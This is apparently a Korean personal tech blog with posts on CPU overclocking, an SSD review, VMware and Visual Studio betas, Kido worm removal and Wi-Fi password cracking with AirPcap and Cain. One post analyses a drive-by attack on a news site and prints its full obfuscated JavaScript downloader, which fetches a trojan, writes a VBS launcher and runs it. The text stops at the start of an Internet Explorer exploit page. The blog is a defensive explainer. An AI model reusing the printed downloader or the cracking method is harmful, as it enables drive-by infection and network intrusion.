E2160 CPU 오버클럭에 관한 정보를 보려면,  아래 두 URL을 참조하시길..
http://www.parkoz.com/zboard/view.php?id=overclock_intel&page=1&sn1=&divpage=2&sn=off&ss=off&sc=off&keyword=51381&select_arrange=headnum&desc=asc&no=11808&sd=on

 
http://www.parkoz.com/zboard/view.php?id=overclock_intel&page=1&sn1=&divpage=2&sn=off&ss=off&sc=off&keyword=51381&select_arrange=headnum&desc=asc&no=12210&sd=on

 

 

 

E2160에 관한 정보는 아래 스샷과 같다.

 

L2캐쉬의 한계때문인지 ,  하는 작업에 한계가 느껴
코어2듀오 E7200  CPU로 업그레이드를 단행하였다.
미리 말하자면 , L2캐쉬의 차이에 따른 성능차는 존재한다는것을 어느정도 체감할 수 있다.

 

 

인텔 코어2듀오 E7200 정품 박스 (2.53Ghz/FSB1066/3MB/LGA775)

 

 

주차 코드는  Q815A534 이다.
08년 15주차임을 뜻한다.
주차마다 수율이 다르게 나오곤 한다.

 

 

저전력이라는 특징이 눈에 띈다.. (Energy-Efficient Computing)

 

 

박스를 개봉하고 나서  내용물 샷.
정품쿨러는 크기가 작은 초코파이 사이즈이니 ,  극오버를 할 사람은 사제쿨러는 필수로 마련하자.

 

 

E7200 CPU모습.
LGA775 패키지이기 때문에 외관상 크게 달라진것은 없다.

 

 

 

좌측이  E7200
우측이 E2160

모습이 약간 다르다.

 

 

이제 설치를 할 차례다.
쿨러는 APACK Zerotherm CF900을 쓴다.
온도센서때문에 너무 저속RPM으로 돌아서 , 온도센서를 잘라버리고 , 잘만 팬메이트2에 물려서 사용하고 있다.
ps. 선이 너무 지저분해서 , CPU장착후 선정리를 하였다..

 

 

 

서멀구리스는   Arctic사의  MX-2 를 사용하였다.
E2160부터 써온것이고 ,  양이 충분하기 때문에 몇년간 써도 문제 없을듯 하다.

 

 

 

 

APACK 제로썸 CF900 쿨러는  히트파이프가 CPU에 바로 밀착되는 방식이기 때문에 , 열전달 효과가 뛰어나다.
그렇지만 , 성능위주의 쿨러로 개발된 제품이 아니고 무소음위주의 제품이기 때문에 , 극오버에 사용할만한 제품은 못된다.

 


장착 후  오버클럭을  해보았다.

 

 

 

 

 CPU : E7200
M/B : MSI P35 Neo2-FR

BIOS 설정은 아래와 같다.

 

400x9.5 = 3800

 

BIOS  Vcore   1.250v

VTT FSB        1.200v

MCH Voltage 1.30v

DDR Voltage   1.90v

나머지는 모두 기본입니다.

Neo2-FR   전압강하방지  연필신공 적용 (블로그 Neo2-FR MOD 참조)

 

스트레스 프라임은 돌리다가 귀찮아서 그만두었다.  (이정도면 실사용에 무리가 없다고 판단했기 때문..)

 

 

 --대략적인 오버과정--

 기본전압 1.125 로 잡히길래 ,  3.16 바로 오버해봤더니 ,  전혀 무리없이 되었고,
분위기 타서 3.8 로 잡아봤는데 , 1.250에 대충 실사용 되는듯 하다.  (삼디마크 등등 잘 돌아갑니다)

4Ghz 도 1.3375v 정도에서 어느정도 안정화되긴 했는데,
풀로드 온도가 80도를 넘어가는거같아서  3.8로 합의보았다.

P35칩셋이  울프 온도를 잘 인식하지 못하는거같다..
(아니면 울프 자체 문제라던가 ,메인보드 제조사에 따라 다른것인가..)

안그래도 Neo2-FR  온도센서 뿔딱으로 말이 많은데...
3.8에서도  풀로드 온도가 Real Temp  70도 가까이 된다.

APACK CF900  , 잘만 팬메이트 저항값 최소치로 풀어놓고  풀RPM으로 가동중인데 , 
역시 성능위주의 사제쿨러가 아니다보니  무리인듯하다.

 

  

 

마지막 테스트

아래는 CPU 종류별   3DMark Vantage  -  CPU Score 이다.

* VGA :  ATI RadeonHD 3850
 

E2160 1.8 @ 3.2Ghz

5190점

 

 

 

 

E7200 2.53 @ 3.16Ghz

6064점

 

 

 

E7200 2.53 @ 3.8Ghz

7219점

 

 

 

 

 

- 추가 보너스 -

 

E7200 @ 4Ghz

 

 

 

무리한 작업을 하지만 않는다면 ,  실사용 가능하나 ,  안정을 최우선으로 택하고 ,  시도만 하고 그만두었다.

저작자 표시 비영리 변경 금지
신고
by Sone 2009.06.30 16:03

Try out these New Features:

  • Windows 7 support (as a Host and Guest OS)  (윈도우7 지원)
  • New WDDM Graphics driver for Windows 7 guests (단 , 윈도우7에서 3D 그래픽 가속은 아직 지원하지 않습니다.)
  • OpenGL and Shader Model 3.0 for Windows XP and Vista guests (XP , Vista - OpenGL 2.1 , SM 3.0 지원)
  • Download VMware vSphere 4 and install ESX as a guest OS to try out the latest features.
  • Dynamically Download the latest VMware Tools package only when you need it.
  • Configure your VMs to use Multi-core and 4-way CPUs. (싱글 ~ 쿼드코어 프로세서 호환성 증진)
  • Print from your VM without installing printer drivers. Virtual Printing courtesy of our friends at ThinPrint.
  • Automatically create snapshots on scheduled intervals with AutoProtect.
  • Secure your Virtual Machines with 128-bit encryption. (AES128-bit encryption 기술을 이용한 VM 암호화 기능)
  • ALSA Sound support on Linux hosts enables multiple VMs to play "music" concurrently.
  • Instantly pause a VM to free up system resources or dedicate horsepower to other running VMs.
  • The highly acclaimed Linux Virtual Network Editor user interface has been implemented for Windows users
  • IPv6 Support (IPv6 규격 지원)



    For Windows Build
    VMware-workstation-e.x.p-169612.exe
    387,906,872 Bytes
    (md5sum:598442b70cced1a145bffd60df535e93)
    (sha1sum:c8d36619a3b1a8978ccee959c6380fee060f70a4)






저작자 표시 비영리 변경 금지
신고
by Sone 2009.06.10 22:54
AirPcap에는 네가지 모델이 있다.
클래식은  Packet Transmission 기능이 없어서 , 거의 쓸모없는 모델이라고 봐도 무방하고,
실제로 많이 쓰이는것은 Tx 이상의 모델이다.
Tx 이상의 모델부터는 가격이 만만찮다....Tx가 298달러 , Ex는 498달러  Nx는 698달러..
현재 환율을 적용해보면 ,  순서대로  36만원 ,  61만원 , 86만원이다.
관세 포함하고 배송비 포함하면  40~ , 70~ , 90~  정도 할듯?
도대체 뭐때문에 저토록 가격차이가 난단 말이냐..차이점을 보아하니
Nx는 일단  n규격의 스니핑과 ,  패킷 인젝션도 지원한다. 그리고  외부 안테나 커넥터가 2개가 있어서 , 훨씬 송수신범위가 넓어진다.
실제로 필자가  Ex 모델에  외부 안테나 하나만 장착했었는데도 ,  거주지 반경 4~6개만 잡혔었던 SSID가   10개 이상 목록에 나타났었다.
이번에 잠시 접해본 AirPcap 모델은  Ex 모델로... 국내에서 보유중인 사람이 거의 드물지만 운좋게도 접해볼 수 있었다.





SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/40sec | F/2.8 | 0.00 EV | 4.3mm | ISO-100 | Off Compulsory | 2009:06:02 20:05:12



SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-160 | Off Compulsory | 2009:05:28 21:15:05



SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-160 | Off Compulsory | 2009:05:28 21:15:48



SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-120 | Off Compulsory | 2009:05:28 21:16:27



SAMSUNG TECHWIN | NV24HD, VLUU NV24HD, LANDIAO NV106HD | Normal program | Pattern | 1/30sec | F/2.8 | 0.00 EV | 4.3mm | ISO-160 | Off Compulsory | 2009:05:28 21:16:36


Cain에서  Wireless Cracking 을 수행해본 결과 ,  아주 잘된다. (스샷 찍는걸 깜빡함)
AirPcap의  Packet Transmission 기능을 이용해서 , Cain의 DeAuth 기능을 통한 , WPA , WEP 등의 접속 암호를 알아낼 수 있다.
그런데 WPA는 사실상 , 뚫기 어렵다고 봐야할듯... 브루투포스를 시행한다 해도 , 걸리는 시간의 압박..
물론 암호를 쉽게 해놓으면 금방 뚫겠지만.


Cain에서의 작업 수행 내역은  나중에 시험 끝나고 , 기회가 되면 올려볼까 합니다.
그리고 차후에 Tx 모델을 구매예정.
저작자 표시 비영리 변경 금지
신고
by Sone 2009.06.02 20:14

 

비주얼 스튜디오 2010 베타1 버젼이 MS에 공개되어서 설치를 해보았다.
그러나...설치 후 10분만에 지웠다 ㅡㅡ;
문제가 뭐냐면  VS2010을 실행하는데만 해도 1분 넘게 걸린다는것,
게다가 프로젝트를 새로 생성하고  컴파일 하려고 하면 PDB를 열수 없다고 나오는데 , PDB를 사용하지 않아도
마찬가지의 에러메시지가 뜬다.

에러메시지를 해결한다고 쳐도 , 전체적으로  매우매우 무겁다고 느껴지는것은 어찌할것인가...
뭐 아직 베타1이라 뭐라 할 단계가 아니지만 ,  Optimization에 신경써야할듯..

 

 












다운로드
저작자 표시 비영리 변경 금지
신고
by Sone 2009.05.22 19:51
OCZ, SSD

WD3200BEVT를 잘 쓰고 있다가,  몇일전에 OCZ에서 Vertex 모델이 출시되었다는 소리를 듣고,
60GB 모델을 홧김에 질러버렸다.





사진 촬영 : 삼성 SPH-M4800  200만 CMOS 소자



SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 19:58:53

27일 오전9시에 입금확인이 됐는데 , 당일 오전11시50분에 도착하였다 -_-; 초스피드
박스가 생각보다 그렇게 크지는 않았다. (SSD니깐 당연한듯)

박스 앞면에서는 간단한 특징들을 요약하고 있다.

SATAII를 지원함으로써 , 더 빠른 엑세스 타임
64Mb Cache
소형 디자인
낮은 전력 소모
충격에 대한 높은 저항력
RAID 지원





SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 20:01:26
박스 뒷면.
각종 세부 정보들이 나와있다.

OCZSSD2-1VTX60G
MTBF (수명) : 150만 시간 (62,500일 =  약 171년)
Shock Resistance (충격 저항력) : 1500G (1G = 지구 중력가속도)
Sustained Write (Write Speed 지속성) : 70Mb/sec
최대 성능 : Read 230Mb/sec , Write 135Mb/sec
작동 온도 : 0~70도 (섭씨)






SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 19:59:13
WD3200BEVT를 살리기 위해서 (버릴수는 없지 않은가?)
한성 울트론 멀티부스트도 3만원을 주고 따로 구매하였다.
필자의 노트북은  산타로사(P965M/ICH8) 플랫폼이고 , CDROM 확장 인터페이스는 IDE 병렬 포트 이므로,
IDE 용 멀티부스트를 구매해야 한다.
요즘의 몬테비나 플랫폼(센트리노2) 사용자분들은 SATA 멀티부스트를 구매해야 할 것이다.






SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 20:03:06

아담한 사이즈의 SSD가 모습을 드러내었다.
설명서는 딱히 읽을건 없었다.





SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 20:03:25

앞면 근접촬영. (폰카라 접사가 안좋습니다.)






SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 20:04:33

SSD 뒷면의 모습





SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 20:07:11
WD3200BEVT를 멀티부스트에 장착하기 위해서  멀티부스트를 준비






SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 20:48:41
먼저 멀티부스트가 들어갈 자리에 위치해 있는  ODD를 제거시켰다.
간단히 나사 1~2개만 풀어주고 당기면 쉽게 빠진다.
다음은 왼쪽 아래에 위치해있는 웨스턴디지털 하드디스크를 제거할 차례이다.






SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 21:22:45
하드를 제거한 뒤 , 멀티부스트에 장착시켰다.
사용중에 알게된 사실이지만 , 멀티부스트에 장착 후 조금만 사용해도
열이 엄청나게 많이 발생한다.(마치 엄청난 열때문에 폭발할것 같은 불안감 마저 들 정도.)






SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 21:32:32
이제 SSD를  SATA1 에 장착할 차례이다. (필자의 노트북은 SATA1 까지만 지원한다)







SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 21:32:44

장착 하기 전 , 측면 모습1





SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 21:32:52

장착 하기 전 , 측면 모습2






SAMSUNG Electronics | Anycall SPH-M4800 | Shutter priority | 0/0sec | F/4.3 | +0.71 EV | 0.0mm | Flash did not fire | 2009:04:27 21:34:11

케이블을 연결 시킨 뒤 , 끼워 넣었다.
 







성능 테스트를 간단히 수행해 보았다.
SSD에  파티션을 생성하고  Operating System 을  Install 하기 전에 ,
기존 WD3200BEVT로 부팅하여 ,  HD Tune 설치 후 , SSD의  Read/Write 테스트를 수행한 결과물이 있었는데,
모르고 지워버리는 사태가 발생...


따라서  현재 이 글을 쓰는 시점에서는
SSD에 윈도우7 RC 7100을 설치한 뒤,  HD Tune Pro 와  Everest Disk Benchmark 툴로 Read Speed 와  Access Time 테스트만 간단히 수행하고자 한다.
(어차피 이 포스팅은 고급 수준의 전문 벤치마크 정보를 담는 성격의 글이 아니다.)



테스트 시스템
CPU : Intel Core2Duo T8100 (Penryn/2.1Ghz/3Mb L2 Cache)
RAM : Samsung Pc2-5300 DDR2 SDRAM (2GB X 2)
HDD : WDC WD3200BEVT (320GB / 5400RPM / 8MB)
         OCZ Vertex 60GB SSD MLC (64Mb Cache)
O/S : MS Windows 7 RC Build 7100 en-US





Everest Disk Benchmark로 전체적인 Read Performance Test 를 수행한 결과이다.
Vertex 60GB MLC와  WD3200BEVT 간의 성능차이가 확연히 드러난다.










HD Tune Pro 3.5 에서 시행한
OCZ Vertex 60GB의  Random Access Time 을 테스트한 결과이다.








WD3200BEVT의 Random Access Time







OCZ Vertex의  Read Speed








WD3200BEVT의  Read Speed


기타 측정 사항:

윈도우7 RC Build 7100 설치 시간 : 6분30초
오피스 2007 일반설치 시간 : 3분52초
한글2007 설치 시간 : 1분




간단한 결론:
0과 1의 디지털 신호로 작동하는 반도체와 
헤드 , 모터 등으로 구성된 기계장치를 비교한다는것 자체가 에러이지만,
분명히 알수 있듯이 , 성능은 하늘과 땅차이 라는것.

문제는 가격.... (필자는 35만에 구매)
저작자 표시 비영리 변경 금지
신고
by Sone 2009.04.28 20:56





대부분 잘 알다시피 ,   김연아 선수가 MBC뉴스데스크와 인터뷰를 한 영상이
오늘 2009년4월22일 9시 뉴스데스크에서 방송이 되었다.

이 영상이 imnews.iMBC.com 홈페이지에 올라온 시각은 ,  9시 뉴스데스크가 끝나고 난 이후일텐데,
이 영상과 기사가 업로드 된 이후로 , 채 3시간이 지나지 않아서 , 이 페이지에 악성 스크립트가 심어졌으며,

이 페이지에 접속을 시도할때마다 ,  위 스크린샷과 같이  리모트 데이터 서비스 데이터 컨트롤 서비스가 실행되려고 한다.
아무것도 모르는 초보들은 , Allow 를 할테고 , 그렇다면 ,  Trojan이 받아지게 된다.

소스코드를 간단히 훑어본 결과,  중국발 해커의 소행이 100%인것으로 보이며, 

1.  해커가 iMBC.com 홈페이지를 악성코드 유포지로 활용하기 위해서 해킹 시도를 하였거나,
2. 기사를 업로드 한 사람의 컴퓨터에 Trojan이 심어져 있는데 ,
기사를 업로드 하면서 악성코드가 같이 업로드 됐을 가능성이 있다.



악성코드 파일들이다.
위 파일들은 중국인 해커가 악성코드 유포를 위해서 의도적으로 해킹한,
즉 악성코드 유포를 목적으로 희생양이 된 서버에 위치해 있을 가능성이 매우 높다.
공개적으로 서버의 IP를 공개하면 위험에 노출될 가능성이 있기때문에  ,그 IP는 공개하지 않는다.



이쯤에서 간단히  악성 스크립트의 소스를 공개하고,  훑어보자.
필자가 자바스크립트를 모르는 관계로 , 나름대로 그냥 훑어보았다.

<script src=14.js></script>  //H.exe 라는 Trojan파일이 있는곳의 URL이 적혀있다. 즉 H.exe를 내려받는다.

<script src=15.js></script>  //이 부분은 바로 아래 부분으로 대치된다.
var aaaaa="A";
var aaaaaa="d";
var aaaaaaa="o";
var nod32=aaaaa+aaaaaa+aaaaaaa;
var nod33="db.S";
var nod34="tre";
var nod35="am";
var GooGleado=nod32+nod33+nod34+nod35;
//aaaaaaaaaaaaaaaaaadb.Stream    ->  Adodb.Stream



<script language="JavaScript">
function gn(rRaGEykU1)
{var Orh2=window["M"+"a"+"th"]["r"+"a"+"n"+"d"+"o"+"m"]()*rRaGEykU1;
return'GooGle'+'.Cn'
}
try
{var GooGlezf,GooGlezfs,GooGlezfx,wwwGooGlecn,wwwGooGlecn2;
var GooGlename='GooGleeee.pif';
var GooGlenames='GooGleeee.vbs';
var chilam=window["d"+"o"+"c"+"u"+"m"+"e"+"n"+"t"]["c"+"re"+"at"+"eE"+"le"+"me"+"nt"]("o"+"b"+"j"+"e"+"c"+"t");
var nod3232="cl";
var GooGleee=nod3232+"s"+"id:";
var GooGleees="0-"+"9"+"8"+"3"+"A"+"-"+"0";
var GooGleeess="0"+"C"+"0"+"4";
var GooGleeesss="F"+"C"+"2"+"9"+"E"+"3"+"6";
var GooGleeex="BD"+"96C";
var GooGleeexx="556"+"-65A3"+"-11D";
var GooGlexml="Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P";
var YuT="Shell.";  //백신의 탐지를 우회하려고 이처럼 변수를 엄청 많이 선언해서 ,
                    //초기화를 여러번 하여,꼬아놓았다. 
                        
                         //코드 읽기가 어렵다. (물론 하나씪 써보면서 대입하면 읽을 수 있지만)
var YuTs="Application";
var YuTx=YuT+YuTs;          //YuTx = Shell.Application
var GooGleeex=GooGleee+GooGleeex+GooGleeexx+GooGleees+GooGleeess+GooGleeesss; 
//GooGleeex = clsid  BD96C556-65A3-11D0-983A-00C04FC29E36  클래스 ID
chilam["setAttribute"]("classid",GooGleeex);   // 속성 설정
var hHf$R6=chilam["CreateObject"]("Scripting.FileSystemObject","");
var GooGle2=chilam["CreateObject"](GooGlexml,"");   //Microsoft.XMLHTTP
var GooGle3;
GooGle3=chilam.CreateObject(GooGleado,""); Adodb.Stream
GooGle3.type=1;
var VgDnZXHt7=hHf$R6.GetSpecialFolder(0);  
//chilam["CreateObject"] ("Scripting.FileSystemObject","");GetSpecialFolder(0);  

var YuTYuT;
YuTYuT=chilam["C"+"r"+"e"+"a"+"t"+"e"+"O"+"b"+"j"+"e"+"c"+"t"](YuTx,"");               //Shell.Application
exp1=hHf$R6["B"+"u"+"i"+"l"+"d"+"P"+"a"+"t"+"h"](VgDnZXHt7+'\\system32','cmd.exe');
//exp1= chilam["CreateObject"]("Scripting.FileSystemObject","");.GetSpecialFolder0);+'\\system32','cmd.exe');

wwwGooGlecn=VgDnZXHt7+"\\"+GooGlename;
////chilam["CreateObject"]("Scripting.FileSystemObject","");GetSpecialFolder(0);'GooGleeee.pif'
GooGle2.Open("G"+"E"+"T",GooGle,0);
GooGle2["s"+"e"+"n"+"d"]();
GooGle3["Open"]();
GooGle3["W"+"ri"+"te"](GooGle2["respon"+"seBody"]);
GooGle3["S"+"a"+"ve"+"T"+"oF"+"il"+"e"](wwwGooGlecn,2);
GooGle3["Close"]();
var GooGleuser="chilam";
wwwGooGlecn2=VgDnZXHt7+"\\"+GooGlenames;  //악성코드가 위치한 경로\'GooGleeee.vbs
var GooGlezf0;
GooGlezf0="Set wwwGooGlecn = CreateObject(\"Wscript.";GooGlezf="Shell\")"+"\n";
GooGlezfs="wwwGooGlecn.run \"cmd /c "+wwwGooGlecn+"\",vbhide";
GooGlezfx=GooGlezf0+GooGlezf+GooGlezfs;
GooGle3["type"]=2;
GooGle3["O"+"p"+"e"+"n"]();
GooGle3["Wr"+"ite"+"Te"+"xt"]=GooGlezfx;
GooGle3["Sav"+"eto"+"fi"+"le"](wwwGooGlecn2,2);
GooGle3["Close"]();
var GooGles="o";
var GooGless="p";
var GooGlesss="e";
var GooGlessss="n";
var GooGlex=GooGles+GooGless+GooGlesss+GooGlessss;   // "open" 이라는 문자열로 초기화
YuTYuT.ShelLExeCute(exp1,' /c '+wwwGooGlecn2,"",GooGlex,0)}catch(GooGlesave){GooGlesave=1}
//ShellExecute(cmd.exe 악성코드가 위치한 경로\GooGleeee.vbs','/c'open,0) catch(1)

//쉘익스큐트를 이용 ,  뭔가를 실행한다.
//이 조차도 역시나 꼬아놓았다.

</script>



VirusTotal 검사결과 ,  최초 4월20일에  검사되었으며 ,   온라인게임 패스워드를 갈취하는 트로이목마로 보인다.
문제는 아직  그나마 잘 알려진 백신들 중에서 42.5%의 탐지율밖에 보이지 못한다는 것이다.
NOD32  , Bitdefender 엔진 등에서도 아직 탐지를 하지 못한다.







따라서 , 악성코드가 존재했을 시간에 ,  이 페이지에 접속한분들은 , 백신 전체 검사를 수행하고,
패스워드를 변경하는것이 우선인것 같다.
뭐 실시간탐지로 사전 차단한 분들은 신경쓰지 않아도 될것같다.

현재 이 시각에는  엠비씨 측에서  은밀히 해결한것으로 보이지만,
큰 규모의 언론사 홈페이지인 만큼  ,  순간적인 짧은 시간에도 페이지 노출수가 상당히 많을것인데,
(더군다나  , 네이버 메인에 MBC TV를 언론사로 지정한 사람들은  네이버 메인에도 노출이 되었을 것이다)
그 시간대에 노출된 사람들은 어떻게 책임질것인가?
은근슬쩍 해결하고 넘어가려 하기 보다는, 뭔가 책임을 지고 해명이라고 해야될텐데
(필자는 절대 MBC까 가 아님을 밝힌다, 단순히 이번 문제가 아무 소리 없이 넘어가는것 같아서
뭔가 문제가 일어날 것 같아서 이 글을 쓴것 뿐이다.)

저작자 표시 비영리 변경 금지
신고
by Sone 2009.04.23 00:53

제가  해당 웜바이러스의  원본을 입수할수만 있었다면 ,  좀더 자세히 제 생각까지 곁들여서 쓸수 있었을텐데,
입수를 하지못해서 ,  Kaspersky Lab과  MS 보안패치 내용을 종합해서 초반에  제 생각까지 곁들여서 하나로 통일해서 써봅니다.





일단  웜 바이러스의 형태로 ,  Viruslist.com 에 공식 기재된 진단명은,
Net-Worm.Win32.Kido  입니다.
변종이  여기서 파생되어져서  이름이 여러가지로 바뀔수가 있습니다.


자신이 사용중인 Microsoft Windows 운영체제가
MS08-067   취약점의  보안패치가 설치되지 않았다면 , 웜 형태로 유입되어서 PC내부로 침투하게됩니다.

감염된 후에 원래 운영체제가 설치되어있었던  드라이브만 HDD 포맷한뒤 , 재설치한다해도 , 이 웜은 이동식 드라이브, Recycle 폴더에까지 흔적을 남기는데
이동식 드라이브에 남아있었던  웜의 잔재나,
혹은
Recycle 폴더내에 남아있었던  웜의 잔재들,  또는  OS 재설치후에도 보안패치가 설치되지 않았다면 웹으로부터 유입되어져서, 
또 다시 활동할수가 있기때문에



사람들이 흔히  포맷을 한뒤 새로 설치해도  지워지지가 않는다,
이건 뭔가 기계적인 문제일것이다.  라고 잘못 알기도 합니다.



백신업체에서 내놓은   Auto Remove Tool을 수행한뒤 , 보안패치를 하는방법과,
자신이 수동으로 삭제한뒤 , 보안패치를 하는 방법이 있습니다.







아래 번역된 내용은   Kaspersky 글로벌 사이트에서 변종버젼이 아닌,
최초로 발견되었었던 , Net-Worm.Win32.Kido  웜에 대한  내용과 그에따른  삭제방법입니다.

(Kaspersky 한국지사에서 소개한 방법과는 약간 상이할 수가 있습니다.)
 - 아마도 약간 변종에 대한 대처방법을 서술한듯 합니다.

좀더 자세한 삭제방법과 정보를 취득하고 싶다면 ,  다음 링크를 방문하십시오.
http://www.kaspersky.co.kr/board/bbs/board.php?bo_table=Malware&wr_id=277






-자동 제거 방법-

1.아래 파일을 받는다.

2. KidoKiller.exe  를 실행합니다.

3. 검사가 끝날때까지 기다립니다.

4. 최신버젼의 백신으로 업데이트 한뒤 , 전체검사를 수행합니다.

5. 보안패치를 실시합니다.



                               위의 파일은  WindowsXP ,   아래 파일은  Widows Vista 입니다.




-수동 제거 방법-
  1. 아래 경로의 레지스트리 키를 삭제합니다.
    [HKLM\SYSTEM\CurrentControlSet\Services\netsvcs] -> 이 경로에 netsvcs 란 키는 원래 존재하지 않습니다.

  2. [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost] "netsvcs"
    위 경로로 가면 netsvcs 내용에 키 파라메터가 2개 있는데 ,이 웜바이러스는 그 파라메터 값을 이용해서(필자 같은경우는 (12320, 1) 2개가 있음)
    System32 이하에   <rnd>.dll   형식의 파일을 만듭니다. (rnd는   무작위를 뜻합니다.)
    그 파일들을 모두 삭제합니다.

  3. 컴퓨터를 재부팅 합니다.
  4. 원래의 웜 파일을 삭제합니다. (이 원래 웜파일의 위치는 당신 컴퓨터에 웜이 어떻게 침투했느냐에 따라서 달라집니다).
  5. system32 폴더에 들어가서 아래와 같은 형식의 파일을 삭제합니다.

    <rnd>.dll    ( <rnd> 부분은 랜덤으로 생성됩니다.)

  6. 모든 이동식 저장 장치에 들어간뒤 , 아래 경로와 파일을 삭제합니다. 들어가서  삭제합니다.

    <X>:\autorun.inf <X>:\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\<rnd>.vmx
    rnd는  랜덤으로 생성되는 이름이며 ,  X 는  이동식 디스크 드라이브 문자열을 말합니다. 

  7. 아래 파일을 OS 버젼에 맞게 내려받아서 설치합니다.



    위의 파일은  WindowsXP ,   아래 파일은  Widows Vista 입니다.

  8. 안티바이러스 SW를 설치하고 , 최신버젼의 DB로 업데이트 한뒤,   전체검사를 수행합니다.
저작자 표시 비영리 변경 금지
신고
by Sone 2009.02.10 18:36

MS로부터 보안패치가 배포될때까지
이 취약성에 관한 ,
임시 해결법은   아래 링크를 참조하시면 됩니다.

http://kr.ahnlab.com/virusNIAsecAdvisor_View.ahn?news_dist=02&site_dist=01&category=VNI002&mid_cate=001&sub_cate1=&sub_cate2=&cPage=1&seq=13473&key=&related






현재

 Microsoft Windows NT 계열의 운영체제와 (윈도우2000 , 윈도우XP , 윈도우 비스타)

 인터넷 익스플로러  버젼 5 부터 ,    8 Beta 2 까지

 이렇게  컴퓨터를 사용중이신   모두에게 해당되는 공격법입니다.

 

 

 

보통 이러한  보안 취약점을 우리가 접하게 되면  ,

 아 뭐  나는 그런일 안일어나겠지?

 하는 경우가   대부분일거라고 생각되네요.

 

그것은 아마도   대부분의 사람들은 컴퓨터 구조와,

   이러한 공격이 어떻게  행해지는지  아예 모르기 때문에,

내가 설마  이런 공격에  당하겠나?  하고  그냥 넘어가기가 대부분 입니다.

 

즉 ,  자신이  나름대로 상상중인  해킹이라는 공격의  범주에는   해당되지 않는거같기 때문에,

그냥 무시하고  넘어가버리는것이지요.

(예 : 나는 해킹이라는것은  남이 보내는 이상한 파일만 조심하면 되는거야!  라고 생각하는데

실제로는 그렇지가 않은것)

 

그리고   마이크로소프트에서  프로그램의 취약점을 해결한   보안패치를  윈도우 업데이트를 통해서 내놓는다고 해도,

보안패치 그거 뭐 ,  크게 신경쓸 필요있나?   백신만 잘 설치하면 장땡이야!

라고 생각하면서  보안패치를 그냥 버리는  경우가 매우 많습니다.

 

보안패치의 심각성을 전혀 깨닫지 못하는거죠.

 

백신은   악성코드만 잡는 역할을 해주지 ,  취약점을 해결해주는 프로그램이 절대 아닙니다.

보안패치를 하지 않으면 , 취약점을 응용한 공격에 추가적으로 당할 수 있다는 점 염두에 두세요.

 

해킹이란 공격은  눈깜짝할 찰나의 사이에 이루어질수 있는게 해킹입니다.

이 글에서 그것을 직접  손쉽게 체험할 수 있습니다.

 

 

 

이 글에서는   현재 언론에서  대두되어지고 있는

XML 파싱 에러를 통한    제로데이 공격에 대해서 간단히  말씀드리고,

 

직접   해킹공격을  간적접으로 체험할 수 있는 기회를 드리겠습니다.

 

물론 해킹공격을 체험할때 , 시스템에  악영향을 끼치는것은  절대 아닙니다.

아! 이런식으로   나쁜 프로그램이 내 컴퓨터로 들어오는구나.......하고 이해만 하시면 됩니다.

 

 

 

 

 

일단 제로데이 공격이라는것을 잘 모르는분들이 많으실겁니다.

 

현재 인터넷 익스플로러  프로그램상에    어떠한  소프트웨어 적으로   취약한 문제점이 발견되었습니다.

이런 부분은 , 해커가  분석을 하면서  발견되는 경우가 대부분인데,

해커는   마이크로소프트에  이 사실을 알리지 않고 ,  그 취약점을 이용한 공격을 게속  써먹습니다.

그러다가 ,  마이크로소프트에서 어느날   그 취약점이 있다는것을  발견했습니다.

그런데  당장 그 문제를 해결할  보안패치를 내놓을 형편이 못되네요?

 

그럼  해커는 보안패치가 나올때까지  계속  그 취약점을 이용한 공격을 써먹을 수 있겠죠?

 

이렇게   프로그램에 문제가 알려지고 난뒤에 , 보안패치가 나올때까지  그 시간차를 이용해서

계속  집중적으로 공격을 행하는것을  제로데이공격이라고 합니다.

 

그럼 실질적으로   현재 이 시간에   이 취약성에 대해서  우리는 무방비하게 노출되어져 있는거죠.

 

 

 

그럼 현재  어떤   망할  나쁜 코드 때문에   이렇게 떠벌려지고 있는건지 , 

해당  원본의 소스코드를  입수해서   여러분께  대략 보여드리고 설명드리겠습니다.

 

 

 

 

 

<html>
<div id="replace">x</div>
<script>

// EXITFUNC=process, CMD=calc.exe
